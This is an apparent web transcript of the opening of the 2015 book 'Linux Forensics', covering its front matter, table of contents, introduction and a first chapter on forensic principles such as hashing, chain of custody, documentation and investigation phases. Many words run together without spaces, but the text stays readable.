createspace linux forensics

401

Upload: j2403

Post on 15-Apr-2016

76 views

Category:

Documents


3 download

DESCRIPTION

Linux Forensics is the most comprehensive and up-to-date resource for those wishing to quickly and efficiently perform forensics on Linux systems. It is also a great asset for anyone that would like to better understand Linux internals. It will guide you step by step through the process of investigating a computer running Linux. Everything you need to know from the moment you receive the call from someone who thinks they have been attacked until the final report is written is covered in this book. All of the tools discussed in this book are free and most are also open source.

TRANSCRIPT

LinuxForensics

LinuxForensicsPhilipPolstra

LinuxForensics

Copyright(c)2015byPentesterAcademy

All rights reserved.Nopart of this publicationmaybe reproduced, stored in a retrievalsystem,distributed,ortransmittedinanyformorbyanymeans,includingphotocopying,recording,orotherelectronicormechanicalmethods,withoutthepriorwrittenpermissionof thepublisher, except in thecaseofbriefquotationsembodied incritical reviewsandcertainothernoncommercialusespermittedbycopyrightlaw.

Although every precaution has been taken to verify the accuracy of the informationcontained herein, the author and publisher assume no responsibility for any errors oromissions.Noliabilityisassumedfordamagesthatmayresultfromtheuseofinformationcontainedwithin.

Firstpublished:July2015

PublishedbyPentesterAcademy,adivisionofBinarySecurityInnovativeSolutionsPvt.Ltd.

http://www.PentesterAcademy.com

FirstEdition

Dedicatedtomywifeoftwentyfiveyears

ContentsAcknowledgements

AuthorBiography

Foreword

Scripts,Videos,TeachingAids,CommunityForumsandmore

Introduction

CHAPTER1FirstStepsINFORMATIONINTHISCHAPTER:

WHATISFORENSICS?

TYPESOFFORENSICS

WHYLINUXFORENSICS?

GENERALPRINCIPLES

MaintainingIntegrity

ChainofCustody

StandardPractices

Documentation

PHASESOFINVESTIGATION

EvidencePreservationandCollection

EvidenceSearching

ReconstructionofEvents

HIGH-LEVELPROCESS

EveryChildisPerfect,JustAskTheParents

BUILDINGATOOLKIT

Hardware

Software

RunningliveLinuxinavirtualmachine

SUMMARY

CHAPTER2DeterminingIfThereWasanIncidentINFORMATIONINTHISCHAPTER:

OPENINGACASE

TALKINGTOUSERS

DOCUMENTATION

Ifyouareusingavirtualmachine,oldermaybebetter

MOUNTINGKNOWN-GOODBINARIES

MINIMIZINGDISTURBANCETOTHESUBJECTSYSTEM

UsingaUSBdrivetostoredata

UsingNetcat

Sendingdatafromthesubjectsystem

Sendingfiles

USINGSCRIPTINGTOAUTOMATETHEPROCESS

Scriptingtheserver

Scriptingtheclient

Shortcircuitingisusefulinmanyplaces

INTRODUCINGOURFIRSTSUBJECTSYSTEM

COLLECTINGVOLATILEDATA

Dateandtimeinformation

Operatingsystemversion

Networkinterfaces

Networkconnections

Openports

Programsassociatedwithvariousports

OpenFiles

RunningProcesses

RoutingTables

Mountedfilesystems

Loadedkernelmodules

Userspastandpresent

Puttingittogetherwithscripting

SUMMARY

CHAPTER3LiveAnalysisINFORMATIONINTHISCHAPTER:

THEREWASANINCIDENT:NOWWHAT?

GETTINGFILEMETADATA

USINGASPREADSHEETPROGRAMTOBUILDATIMELINE

EXAMININGUSERCOMMANDHISTORY

GETTINGLOGFILES

COLLECTINGFILEHASHES

DUMPINGRAM

RAMacquisitionmethods

BuildingLiME

UsingLiMEtodumpRAM

SUMMARY

CHAPTER4CreatingImagesINFORMATIONINTHISCHAPTER:

SHUTTINGDOWNTHESYSTEM

Normalshutdown

Pullingtheplug

IMAGEFORMATS

Rawformat

Proprietaryformatwithembeddedmetadata

Proprietaryformatwithmetadatainaseparatefile

Rawformatwithhashesstoredinaseparatefile

USINGDD

USINGDCFLDD

HARDWAREWRITEBLOCKING

SOFTWAREWRITEBLOCKING

Udevrules

LiveLinuxdistributions

CREATINGANIMAGEFROMAVIRTUALMACHINE

CREATINGANIMAGEFROMAPHYSICALDRIVE

SUMMARY

CHAPTER5MountingImages

INFORMATIONINTHISCHAPTER:

PARTITIONBASICS

MASTERBOOTRECORDPARTITIONS

EXTENDEDPARTITIONS

GUIDPARTITIONS

MOUNTINGPARTITIONSFROMANIMAGEFILEONLINUX

USINGPYTHONTOAUTOMATETHEMOUNTINGPROCESS

MBR-basedprimarypartitions

ScriptingorProgrammingLanguage

MBR-basedextendedpartitions

GPTpartitions

SUMMARY

CHAPTER6AnalyzingMountedImagesINFORMATIONINTHISCHAPTER:

GETTINGMODIFICATION,ACCESS,ANDCREATIONTIMESTAMPS

IMPORTINGINFORMATIONINTOLIBREOFFICE

IMPORTINGDATAINTOMySQL

Whentoolsfailyou

CREATINGATIMELINE

EXAMININGBASHHISTORIES

EXAMININGSYSTEMLOGS

EXAMININGLOGINSANDLOGINATTEMPTS

OPTIONAL–GETTINGALLTHELOGS

SUMMARY

CHAPTER7ExtendedFilesystemsINFORMATIONINTHISCHAPTER:

EXTENDEDFILESYSTEMBASICS

SUPERBLOCKS

EXTENDEDFILESYSTEMFEATURES

CompatibleFeatures

Incompatiblefeatures

Read-onlycompatiblefeatures

USINGPYTHON

Readingthesuperblock

Readingblockgroupdescriptors

Combiningsuperblockandgroupdescriptorinformation

FINDINGTHINGSTHATAREOUTOFPLACE

INODES

ReadinginodeswithPython

Inodeextensionsanddetails

Goingfromaninodetoafile

Extents

Directoryentries

Extendedattributes

JOURNALING

SUMMARY

CHAPTER8MemoryAnalysisINFORMATIONINTHISCHAPTER:

VOLATILITY

CREATINGAVOLATILITYPROFILE

GETTINGPROCESSINFORMATION

PROCESSMAPSANDDUMPS

GETTINGBASHHISTORIES

VOLATILITYCHECKCOMMANDS

GETTINGNETWORKINGINFORMATION

GETTINGFILESYSTEMINFORMATION

MISCELLANEOUSVOLATILITYCOMMANDS

SUMMARY

CHAPTER9DealingwithMoreAdvancedAttackersINFORMATIONINTHISCHAPTER:

SUMMARYOFTHEPFEATTACK

THESCENARIO

INITIALLIVERESPONSE

MEMORYANALYSIS

FILESYSTEMANALYSIS

LEVERAGINGMYSQL

MISCELLANEOUSFINDINGS

SUMMARYOFFINDINGSANDNEXTSTEPS

SUMMARY

CHAPTER10MalwareINFORMATIONINTHISCHAPTER:

ISITMALWARE?

Thefilecommand

Isitaknown-badfile?

Usingstrings

Listingsymbolinformationwithnm

Listingsharedlibrarieswithldd

ITHINKITISMALWARE

Gettingthebigpicturewithreadelf

Usingobjdumptodisassemblecode

DYNAMICANALYSIS

Tracingsystemcalls

Tracinglibrarycalls

UsingtheGNUDebuggerforreverseengineering

OBFUSCATION

SUMMARY

CHAPTER11TheRoadAheadINFORMATIONINTHISCHAPTER:

NOWWHAT?

COMMUNITIES

LEARNINGMORE

CONGREGATE

CERTIFY

SUMMARY

AcknowledgementsFirstandforemostIwouldliketothankmywifeandchildrenforallowingmetotakethetimetowritethisbook.Thisbookwouldneverhavehappenedwithouttheirsupport.

Many thanks to Vivek Ramachandran and the whole Pentester Academy team forhonoringmetwice.First,IhadtheprivilegeofbeingthefirstexternaltrainerforPentesterAcademy. Second, I was granted the ability to author the first book ever published byPentesterAcademy.

MydeepestthanksgotoDr.SusanBakerforgraciouslyofferingtoreadthisentirebookandserveascopyeditor.

Finally, I would like to my many supportive friends in the information securitycommunitywhohaveprovidedencouragementtomethroughouttheyears.

AuthorBiographyDr. Philip Polstra (known to his friends as Dr. Phil) is an internationally recognizedhardwarehacker.Hisworkhasbeenpresentedatnumerousconferencesaroundtheglobeincluding repeat performances at DEFCON, BlackHat, 44CON, GrrCON, MakerFaire,ForenSecure, and other top conferences. Dr. Polstra is a well-known expert on USBforensicsandhaspublishedseveralarticlesonthistopic.HehasdevelopedanumberofvideocoursesincludingonesonLinuxforensics,USBforensics,andreverseengineering.

Dr.PolstrahasdevelopeddegreeprogramsindigitalforensicsandethicalhackingwhileservingasaprofessorandHackerinResidenceataprivateuniversityintheMidwesternUnitedStates.HecurrentlyteachescomputerscienceanddigitalforensicsatBloomsburgUniversity of Pennsylvania. In addition to teaching, he provides training and performspenetrationtestsonaconsultingbasis.Whennotworking,hehasbeenknowntofly,buildaircraft, and tinker with electronics. His latest happenings can be found on his blog:http://polstra.org.Youcanalsofollowhimat@ppolstraonTwitter.

ForewordHelloAll!

PhilandImetonlinearoundfiveyearsbackthroughSecurityTube.netandwe’vebeengreat friends ever since. Over the years, we discussed interesting projects we couldcollaborate on and information security education was on top of our list as expected.Based on our discussions, Phil created an excellent “USB Forensics” and “LinuxForensics”videoseriesforPentesterAcademy!Both thevideoserieswerefantasticandwellreceivedbyourstudents.

I’d always wanted to convert our online video series into books and Phil’s “LinuxForensics” video course seemed like the best place to start this adventure! And so wehave! I’d like to take thisopportunity towishPhilandmypublishing teamatPentesterAcademybonvoyageonthisnewendeavor!

Finally but most importantly, I’d like to thank the SecurityTube.net and PentesterAcademycommunityandourstudentsfortheirloveandsupportovertheyears!Wewouldnotbehere todaywithoutyouguys!You’vemadeallourdreamscometrue.Wecannotthankyouenough.

VivekRamachandran

Founder,SecurityTube.netandPentesterAcademy

Scripts,Videos,TeachingAids,CommunityForumsandmoreBookwebsiteWe’vecreatedtwomirrorwebsitesforthe“LinuxForensics”book:

http://www.pentesteracademy.com/bookshttp://www.linuxforensicsbook.com

ScriptsandSupportingFilesAllPythonandshellscriptshavebeenmadeavailablefordownloadonthewebsite.We’vetried our best to ensure that the codeworks and is error free but if you find any bugspleasereportthemandwewillpubliclyacknowledgeyouonthewebsite.

VideosWe are Pentester Academy and we love videos! Though the book is completely self-sufficientwe thought itwould be fun to have videos for a select few labs by the bookauthorhimself!YoucanaccesstheseforFREEonthebookwebsite.

CommunityForumsWewouldlovetoconnectwithourbookreaders–gettheirfeedbackandknowfromthemfirsthandwhattheywouldliketoseeinthenextedition?Also,wouldn’titbegreattohavea community forum where readers could interact with each other and even with theauthor!Ourbookcommunityforumsdojustthat!Youcanaccesstheforumsthroughthewebsitementionedabove.

TeachingAidsAre you a professor or a commercial trainer? Do you want to use this book in class?We’vegotyourcovered!Throughourwebsite,youcanregisterasatrainerandgetaccesstoteachingaidssuchaspresentations,exercisefilesandotherteachingaids.

LinuxForensicsBookSwag!Visit the swag section on our website and get your “Linux Forensics” T-Shirts, mugs,keychainsandothercoolswags!

IntroductionInformationinThisChapter:

WhatthisbookisaboutIntendedaudienceHowthisbookisorganized

WhatthisbookisaboutThis book is about performing forensic investigations on subject systems running theLinuxoperatingsystem.InmanycasesLinuxforensicsissomethingthatisdoneaspartofincidentresponse.Thatwillbethefocusofthisbook.Thatsaid,muchofwhatyouneedtoknow in order to perform Linux incident response can also be applied to any Linuxforensicinvestigation.

AlongthewaywewilllearnhowtobetteruseLinuxandthemanytoolsitprovides.Inadditiontocoveringtheessentialsofforensics,wewillexplorehowtousePython,shellscripting, and standardLinux system tools tomore quickly and easily perform forensicinvestigations.Much ofwhat is covered in this book can also be leveraged by anyonewishing to perform forensic investigations of Windows subjects on a Linux-basedforensicsworkstation.

IntendedaudienceThisbookisprimarilyintendedtobereadbyforensicspractitionersandotherinformationsecurityprofessionals.ItdescribesindetailhowtoinvestigatecomputersrunningLinux.ForensicinvestigatorswhoworkprimarilywithWindowssubjectswhowouldliketolearnmore about Linux should find this book useful. This book should also prove useful toLinux users and system administrators who are interested in the mechanics of Linuxsystembreachesandensuing investigations.The informationcontainedwithin thisbookshouldallowapersontoinvestigatethemajorityofattackstoLinuxsystems.

TheonlyknowledgeareaderofthisbookisassumedtohaveisthatofanormalLinuxuser.YouneednotbeaLinuxsystemadministrator,hacker,orpowerusertolearnfromthis book. Knowledge of Linux system administration, Python, shell scripting, andAssembly would be helpful, but definitely not required. Sufficient information will beprovidedforthosenewtothesetopics.

HowthisbookisorganizedThis book beginswith a brief introduction to forensics. From therewewill delve intoansweringthequestion,“Wasthereanincident?”Inordertoanswerthisquestion,variouslive analysis tools and techniques will be presented.We then discuss the creation andanalysisofforensicfilesystemandmemoryimages.AdvancedattacksonLinuxsystemsandmalwareroundoutourdiscussion.

Chapter1:FirstStepsChapter 1 is an introduction to the field of forensics. It covers the various types offorensics and motivation for performing forensics on Linux systems. Phases ofinvestigationsandthehigh-levelprocessarealsodiscussed.Step-by-stepinstructionsforbuildingaLinuxforensicstoolkitareprovidedinthischapter.

Chapter2:Wasthereanincident?Chapter2walksyou throughwhathappens from thepointwhereaclientwhosuspectssomethinghashappenedcallsuntilyoucanbereasonablysurewhethertherewasorwasnot an incident. It covers opening a case, talking to users, creating appropriatedocumentation, mounting known-good binaries, minimizing disturbance to the subjectsystem, using scripting to automate the process, and collecting volatile data. A niceintroductiontoshellscriptingisalsoprovidedinthischapter.

Chapter3:LiveAnalysisChapter 3 describes what to do before shutting down the subject system. It coverscapturingfilemetadata,buildingtimelines,collectingusercommandhistories,performinglogfileanalysis,hashing,dumpingmemory,andautomatingwithscripting.AnumberofnewshellscriptingtechniquesandLinuxsystemtoolsarealsopresentedinthischapter.

Chapter4:CreatingImagesChapter4startswithadiscussionoftheoptionsforshuttingdownasubjectsystem.Fromthere the discussion turns to tools and techniques used to create a forensic image of afilesystem.Topicscoveredincludeshuttingdownthesystem,imageformats,usingddanddcfldd, hardware and softwarewrite blocking, and liveLinux distributions.Methods ofcreatingimagesfordifferentcircumstancesarediscussedindetail.

Chapter5:MountingImagesChapter 5beginswith adiscussionof thevarious typesof partitioning systems:MasterBoot Record (MBR) based partitions, extended partitions, and GUID partition tables.Linuxcommandsandtechniquesusedtomountalltypesofpartitionsarepresented.Thechapter ends with an introduction to Python and how it can be used to automate theprocessofmountingpartitions.

Chapter6:AnalyzingMountedImagesChapter6describeshow toanalyzemounted filesystem images. It covers filemetadata,commandhistories,systemlogs,andothercommoninformationinvestigatedduringdeadanalysis.Useof spreadsheets andMySQL to enhance investigations is discussed.Somenewshellscriptingtechniquesarealsopresented.

Chapter7:ExtendedFilesystems

Chapter 7 is the largest chapter in this book.All aspects ofLinux extended filesystems(ext2,ext3,andext4)arediscussedindetail.AnextensivesetofPythonandshellscriptsarepresentedinthischapter.Advancedtechniquesfordetectingalterationsofmetadatabyanattackerareprovidedinthischapter.

Chapter8:MemoryAnalysisChapter8 introduces thenew fieldofmemoryanalysis.TheVolatilitymemoryanalysisframework is discussed in detail. Topics covered include creating Volatility profiles,getting process information, process maps and dumps, getting bash histories, usingVolatility check plugins, retrieving network information, and obtaining in-memoryfilesyteminformation.

Chapter9:DealingwithMoreAdvancedAttackersChapter 9 walks you through a more sophisticated attack in detail. The techniquesdescribeduptothispointinthebookareappliedtoanewscenario.Reportingoffindingstotheclientisalsodiscussed.

Chapter10:MalwareChapter10providesan introduction toLinuxmalwareanalysis. Itcoversstandard toolsforinvestigatingunknownfilessuchasthefileutility,hashdatabases, thestringsutility,nm,ldd,readelf,objdump,strace, ltrace,andgdb.Obfuscationtechniquesarediscussed.Safetyissuesarepresented.AnintroductiontoAssemblyisalsoprovided.

Chapter11:TheRoadAheadIn this final chapter several suggestions for further study are provided.General tips arealsogivenforasuccessfulcareerinvolvingforensics.

ConclusionCountlesshourshavebeenspentdeveloping thisbookandaccompanyingscripts. Ithasbeenalaboroflove,however.IhopeyouenjoyreadingandactuallyapplyingwhatisinthisbookasmuchasIhaveenjoyedwritingit.

For updates to this book and also my latest happenings consult my websitehttp://philpolstra.com. You can also contact me via my Twitter account, @ppolstra.Downloads related to the book and other forms of community support are available atPentesterAcademyhttp://pentesteracademy.com.

CHAPTER

1FirstStepsINFORMATIONINTHISCHAPTER:

Whatisforensics?TypesofforensicsWhyLinuxforensics?GeneralprinciplesPhasesofinvestigationHigh-levelprocessBuildingatoolkit

WHATISFORENSICS?AnaturalquestiontoaskyourselfifyouarereadingabookonLinuxforensicsis:Whatisforensicsanyway?Ifyouaskdifferentforensicexaminersyouarelikelytoreceiveslightlydifferentanswerstothisquestion.AccordingtoarecentversionoftheMerriam-Websterdictionary: “Forensic (n) belonging to, used in, or suitable to courts of judicature or topublicdiscussionanddebate.”Usingthisdefinitionofthewordforensicmydefinitionofforensicscienceisasfollows:

Forensic science or forensics is the scientific collection of evidence of sufficientqualitythatitissuitableforuseincourt.

The key point to keep inmind is thatwe should be collecting evidence of sufficientqualitythatwecanuseitincourt,evenifweneverintendtogotocourtwithourfindings.Itisalwayseasiertorelaxourstandardsthantotightenthemlater.Weshouldalsoactlikescientists,doingeverythinginamethodicalandtechnicallysoundmanner.

TYPESOFFORENSICSWhenmostpeoplehearthetermforensicstheythinkaboutthingstheymighthaveseenonshows such as CSI. This is what I refer to as physical forensics. Some of the morecommonlyencounteredareasofphysical forensics include fingerprints,DNA,ballistics,and blood spatter. One of the fundamental principles of physical forensics is Locard’sTransfer (or Exchange) Principle. Locard essentially said that if objects interact, theytransfer(orexchange)material.Forexample,ifyouhitsomethingwithyourcarthereisoften an exchange of paint.As further examples,when you touch a surface youmightleavefingerprintsandyoumighttakedirtwithyouonyourshoeswhenyouleaveanarea.

ThisbookcoverswhatIwouldrefertoasdigitalforensics.Somelikethetermcomputer

forensics,but Ipreferdigital forensics as it ismuchbroader.We live in aworld that isincreasingly reliant on electronic devices such as smart phones, tablets, laptops, anddesktop computers.Given the amount of informationmany people store on their smartphonesandothersmalldevices,itisoftenusefultoexaminethosedevicesifsomeoneissuspectedofsomesortofcrime.Thescopeof thisbook is limited tocomputers (whichcouldbeembedded)runningaversionofLinux.

There are many specializations within the broader space of digital forensics. Theseinclude network forensics, data storage forensics, small device forensics, computerforensics, and many other areas. Within these specializations there are furthersubdivisions.Itisnotunusualforforensicexaminerstobehighlyspecialized.MyhopeisthatbythetimeyoufinishthisbookyouwillbeproficientenoughwithLinuxforensicstoperforminvestigationsofallbutthemostadvancedattackstoLinuxsystems.

WHYLINUXFORENSICS?PresumablyifyouarereadingthisyouseethevalueinlearningLinuxforensics.Thesamemaynotbetrueofyourbossandothers,however.HereissomeammunitionforthemonwhyyoumightbenefitfromstudyingLinuxforensics.

WhileLinuxisnotthemostcommonoperatingsystemonthedesktop,itispresentinmanyplaces.EvenintheUnitedStates,whereWindowstendstodominatethedesktops,manyorganizations runLinux in the server room.Linux is the choiceofmany InternetServiceProviders (ISP)and largecompanies suchasGoogle (theyevenhave theirownflavorofLinux).Linuxisalsoextremelypopularindevelopmentorganizations.

Linuxisthestandardchoiceforanyoneworkingininformationsecurityorforensics.Astheoperatingsystems“byprogrammersforprogrammers,” it isverypopularwithblackhathackers.Ifyoufindyourselfexaminingtheblackhat’scomputer,it islikelyrunningLinux.

Many devices all around us are running some version of Linux. Whether it is thewireless access point that you bought at the local electronics store or the smarttemperature controller keeping your home comfortable, they are likely running Linuxunderthehood.LinuxalsosharessomeheritageandfunctionalitywithAndroidandOSX.

LinuxisalsoagreatplatformforperformingforensicsonWindows,OSX,Androidorothersystems.Theoperatingsystemisrichwithfreeandopensourcetoolsforperformingforensicsondevicesrunningvirtuallyeveryoperatingsystemontheplanet.Ifyourbudgetislimited,Linuxisdefinitelythewaytogo.

GENERALPRINCIPLESThereareanumberofgeneralguidingprinciplesthatshouldbefollowedwhenpracticingforensics.These includemaintaining the integrity of evidence,maintaining the chain ofcustody, following standard practice, and fully documenting everything. These arediscussedinmoredetailbelow.

MaintainingIntegrityItisoftheutmostimportancethatevidencenotbealteredwhileitisbeingcollectedandexamined.Wearefortunate indigital forensics thatwecannormallymakeanunlimitednumberofidenticalcopiesofevidence.Thoseworkingwithphysicalforensicsarenotsolucky.Infact, inmanycasesdifficultchoicesmustbemadewhenquantitiesofphysicalevidencearelimitedasmanytestsconsumeevidence.

The primary method of insuring integrity of digital evidence is hashing. Hashing iswidely used in computer science as away of improving performance.Ahash function,generallyspeaking, takesan inputofvariablesizeandoutputsanumberofknownsize.Hashingallows for faster searchesbecausecomputerscancompare twonumbers inoneclock cycle versus iterating over every character in a long string which could requirehundredsorthousandsofclockcycles.

Usinghashfunctionsinyourprogramscanaddalittlecomplicationbecausemorethanone input value can produce the same hash output. When this happens we say that acollisionhas occurred.Collisions are a complication in our programs, butwhenwe areusing hashes for encryption or integrity checking the possibility of many collisions isunacceptable. To minimize the number of collisions we must use cryptographic hashfunctions.

There are several cryptographic hash functions available. Some people still use theMessageDigest5(MD5)toverifyintegrityofimages.TheMD5algorithmisnolongerconsidered to be secure and the Secure Hash Algorithm (SHA) family of functions ispreferred.Theoriginalversion is referred toasSHA1(or justSHA).SHA2iscurrentlythemostcommonlyusedvariantandyoumayencounterreferences toSHA2(224bits),SHA256 (256 bits), SHA384 (384 bits), and SHA512 (512 bits). There is a SHA3algorithm, but its use is not yet widespread. I normally use SHA256 which is a goodmiddlegroundofferinggoodperformancewithlowchancesofcollisions.

Wewilldiscussthedetailsofusinghashinginfuturechapters.Fornowthehighlevelprocessisasfollows.First,calculateahashoftheoriginal.Second,createanimagewhichwewill treat as amaster copy. Third, calculate the hash of the copy and verify that itmatchesthehashoftheoriginal.Fourth,makeworkingcopiesofyourmastercopy.Themastercopyandoriginalshouldneverbeusedagain.Whileitmayseemstrange,thehashon working copies should be periodically recalculated as a double check that theinvestigatordidnotaltertheimage.

ChainofCustodyPhysical evidence is often stored in evidence bags. Evidence bags either incorporate achain of custody form or have such a form attached to them. Each time evidence isremovedfromthebagtheformisupdatedwithwhotouchedtheevidenceandwhatwasdone.Thecollectionofentriesonthisformmakeupthechainofcustody.Essentiallythechain of custody is a guarantee that the evidence has not been altered and has beenproperlymaintained.

In the case of digital forensics the chain of custody is still important.Whilewe canmakeunlimiteddigitalcopies,wemuststillmaintaintheintegrityoftheoriginal.Thisisalsowhyamastercopyshouldbemadethatisneverusedtoforanyotherpurposethancreatingworkingcopiesasitpreventstheneedtotouchtheoriginalotherthanfortheone-timeeventofcreatingthemastercopy.

StandardPracticesFollowing standard practices makes your investigation easier. By following a writtenprocedure accurately there is less explaining to do if you should find yourself in court.Youarealsolesslikelytoforgetsomethingormakeamistake.Additionally,ifyoufollowstandardpracticesthereislessdocumentationthathastobedone.Itusedtobesaidthat“nobodywaseverfiredforbuyingIBM.”Similarly,noforensicinvestigatorevergotintotroubleusingwrittenproceduresthatconformtoindustrystandardpractice.

DocumentationWhen in doubt document. It never hurts to overdo the documentation. As mentionedpreviously,ifyoufollowstandardwrittenproceduresyoucanreferencethemasopposedtorepeatingtheminyournotes.Speakingofnotes, I recommendhandwrittennotes inaboundnotebookwithnumberedpages.Thismightsoundstrangetoreaderswhoareusedtousingcomputersforeverything,butitismuchquickertojotnotesontopaper.Itisalsoeasiertocarryasetofhandwrittennotestocourt.

Theboundnotebookhasotheradvantagesaswell.Nopowerisrequiredtoviewthesenotes.Theuseofaboundnotebookwithnumberedpagesalsomakesitmoredifficulttoalter your notes. Not that you would alter them, but a lawyer might not be beyondaccusing you of such a thing. If you have difficulty finding a notebookwith numberedpagesyoucannumberthemyourselfbeforeuse.

Ifyoucanworkwith someoneelse it is ideal.Pilots routinelyusechecklists tomakesuretheydon’tmissanything.Commercialpilotsworkinpairsasextrainsuranceagainstmistakes.Workingwithapartnerallowsyoutohaveasecondsetofeyes,letsyouworkmorequickly,andalsomakesitevenharderforsomeonetoaccuseyouoftamperingwithevidence. History is replete with examples of people who have avoided conviction byaccusingsomeoneofevidencetamperingandinstillingsufficientdoubtinajury.

Fewpeoplelovetododocumentation.Thisseemstobetruetoagreaterextentamongtechnicalpeople.Therearesometoolsthatcaneasethepainofdocumentingyourfindingsthatwillbediscussedinlaterchaptersofthisbook.Aninvestigationisneveroveruntilthedocumentationisfinished.

PHASESOFINVESTIGATIONThere are three phases to a forensic investigation: evidence preservation, evidencesearching,andeventreconstruction.Itisnotunusualfortheretobesomecyclingbetweenthephasesasaninvestigationproceeds.Thesephasesaredescribedinmoredetailbelow.

EvidencePreservationandCollectionMedicalprofessionalshaveasaying“Firstdonoharm.”Fordigitalforensicspractitionersourmottoshouldbe“Don’talterthedata.”Thissoundssimpleenough.Inactualityitisabitmorecomplicatedasdataisvolatile.Thereisahierarchyofvolatilitythatexistsindatafoundinanysystem.

Themostvolatile data canbe found inCPU registers.These registers arehigh speedscratch memory locations. Capturing their contents is next to impossible. Fortunately,thereislittleforensicvalueinthesecontents.CPUcachesarethenextleveldownintermsofvolatility.Likeregisterstheyarehardtocaptureandalso,thankfully,oflittleforensicvalue.

SlightlylessvolatilethanstorageintheCPUarebuffersfoundinvariousdevicessuchasnetworkcards.Notallinput/outputdeviceshavetheirownstoragebuffers.Somelow-speeddevicesusemainsystemmemory(RAM)forbuffering.AswithdatastoredintheCPU,thisdataisdifficulttocapture.Intheory,anythingstoredinthesebuffersshouldbereplicated in system memory assuming it came from or was destined for the targetcomputer.

System memory is also volatile. Once power has been lost, RAM is cleared.Whencomparedtopreviouslydiscusseditems,systemmemoryisrelativelyeasytocapture.Inmostcases it isnotpossible tocollect thecontentsofsystemmemorywithoutchangingmemory contents slightly. An exception to this would be hardware-based memorycollection.Memoryacquisitionwillbediscussedingreaterdetailinalaterchapter.

Duetolimitationsintechnology,untilrecentlymuchofdigitalforensicswasfocusedon“deadanalysis”ofimagesfromharddrivesandothermedia.Evenwhendealingwithnon-volatilemedia,volatilityisstillanissue.Oneoftheoldestquestionsincomputersecurityand forensics is whether or not to pull the plug on a system you suspect has beencompromised.

Pulling the plug can lead to data loss as anything cached for writing to media willdisappear.Onmodernjournalingfilesystems(byfarthemostcommonsituationonLinuxsystemstoday)thisislessofanissueasthejournalcanbeusedtocorrectanycorruption.Ifthesystemisshutdowninthenormalmannersomemalwarewillattempttocoveritstracksorevenworsedestroyotherdataonthesystem.

Executing a normal shutdown has the advantage of flushing buffers and caches. Aspreviously mentioned, the orderly shutdown is not without possible disadvantages. Aswith many things in forensics, the correct answer as to which method is better is, “itdepends.”Therearemethodsofobtainingimagesofharddrivesandothermediawhichdonot require a systemshutdownwhich further complicates this decision.Details of thesemethodswillbepresentedinfuturechapters.

EvidenceSearchingThanks to theexplosionofstoragecapacity itbecomesharder to locateevidencewithin

the seaofdata stored ina typicalcomputerwitheachpassingyear.Dataexistsat threelevels,data,information,andevidence,asshowninFigure1.1.

FIGURE1.1

Thedatahierarchy.

AsshowninFigure1.1,thelowestlevelofdataisjustrawdata.Rawdataconsistsofbits,normallyorganizedasbytes, involatileornon-volatilestorage.In thiscategorywefindthingssuchasrawdisksectors.Itcanbeachallengetousedataatthislevelandonmostmodernsystemsthereisplentyofdataouttheretopickthrough.

Aboverawdatawehaveinformation.Informationconsistsofrawdatawithsomesortofmeaningattachedtoit.Forexample,animagehasmoremeaningtoahumanthanthebitsthatmakeupaJPEGfileusedtostoretheimage.Eventextfilesexistatthislevelinour hierarchy. Bringing many bytes of ASCII or Unicode values together gives themmeaningbeyondtheircollectionofbytes.

At the highest level in or hierarchy is evidence. While there may be thousands ormillionsoffiles(collectionsofinformation)itisunlikelythatthebulkofthemhaveanyrelevancetoaninvestigation.Thisleadsustoponderwhatitmeansforinformationtoberelevanttoaninvestigation.

Aspreviouslymentioned,forensicsisascience.Giventhatwearetryingtodoscience,weshouldbedevelopinghypothesesandthensearchingforinformationthatsupportsorrefutes a hypothesis. It is important to remain objective during an investigation as thesamepieceof evidencemightbe interpreteddifferentlybasedonpeople’spreconceivednotions.

Itisextremelyimportantthatinvestigatorsdonotbecomevictimsofconfirmationbias.Put simply, confirmation bias is only looking at information that supports what you

believetobetruewhilediscountinganythingthatwouldrefutewhatyoubelieve.Giventheamountofdata thatmustbeexaminedina typical investigationahypothesisor twoconcerningwhatyouthinkyouwill findisgood(theownerof thecomputerdidX, thiscomputer was successfully exploited, etc.) to help guide you through the searchingprocess.Don’t fall into the trapof assumingyourhypothesis or hypotheses are correct,however.

CONFIRMATIONBIASINACTIONEveryChildisPerfect,JustAskTheParentsOne of the best stories to describe confirmation bias goes as follows. Johnny lovedmagicians.Onedayhisparentstookhimtoseeafamousmagician,PhiltheGreat.Attheendof theshow theparents toldPhilhowmuch their son lovedmagic.Phil thenofferedtoshowthematrick.Johnnyeagerlyaccepted.

Themagicianproceededtopulloutacoinandmoveitbackandforthbetweenbothhandsthenclosedhisfistsandheldouthishands.HeaskedJohnnytoidentifythehandcontaining the coin, which he did correctly. Now guessing correctly one time is notmuchofafeat,butthisgamewasrepeatedmanytimesandeachtimeJohnnycorrectlyguessed the hand containing the coin. While this was going on the magician madecommentslike,“Youmusthaveexcellentvisiontoseewhichhandcontainsthecoin,”and“Youmustbeanexpertonreadingmyfacialexpressionsandthatishowyouknowwherethecoinis.”

Eventually Johnny had correctly identified the handwith the coin fifty times in arow!Hisparentswereamazed.TheycalledthegrandparentsandtoldalloftheirfriendsaboutitonFacebook,Twitter,andothersocialmediasites.Whentheyfinallythankedthemagicianandturnedtoleave,heshouted,“goodbye,”andwavedwithbothhands.Eachhandcontainedacoin.

Itwas theparents’confirmationbias that lead themtobelievewhat theywanted tobelieve,thatJohnnywasasavant,anddistractedthemfromthetruth,thatthemagicianwasindeedtrickingthem.Remainobjectiveduringaninvestigation.Don’tletwhatyouoryourbosswanttobetruekeepyoufromseeingcontraryevidence.

ReconstructionofEventsInmymindtryingtoreconstructwhathappenedisthemostfunpartofaninvestigation.Theexplosioninsizeofstoragemediamightmakethesearchingphaselongerthanitwasinthepast,butthatonlyhelpstomakethereconstructionphasethatmuchmoreenjoyable.It is very unlikely that you will find all the evidence you need for your eventreconstructioninoneplace.Itismuchmorecommontogetlittlepiecesofevidencefrommultiple placeswhich you put together into a larger picture. For example, a suspiciousprocess in a process list stored in amemory imagemight leadyou to look at files in a

filesystem imagewhichmight lead you back to an open file list in thememory imagewhichinturnpointstowardfilesinthefilesystemimage.Puttingallofthesebitstogethermightallowyoutodeterminewhenandbywhomarootkitwasdownloadedandwhenandbywhichuseritwassubsequentlyinstalled.

HIGH-LEVELPROCESSWhilenoteveryLinuxforensicinvestigationispartofanincidentresponse,itwillbethefocus of this book. The justification for this is that the vastmajority of Linux forensicinvestigations are conducted after a suspected breach. Additionally, many of the itemsdiscussed in this bookwill be relevant to other Linux investigations aswell. The highlevelprocessforincidentresponseisshowninFigure1.2.

FIGURE1.2

High-levelProcessforLinuxIncidentResponse

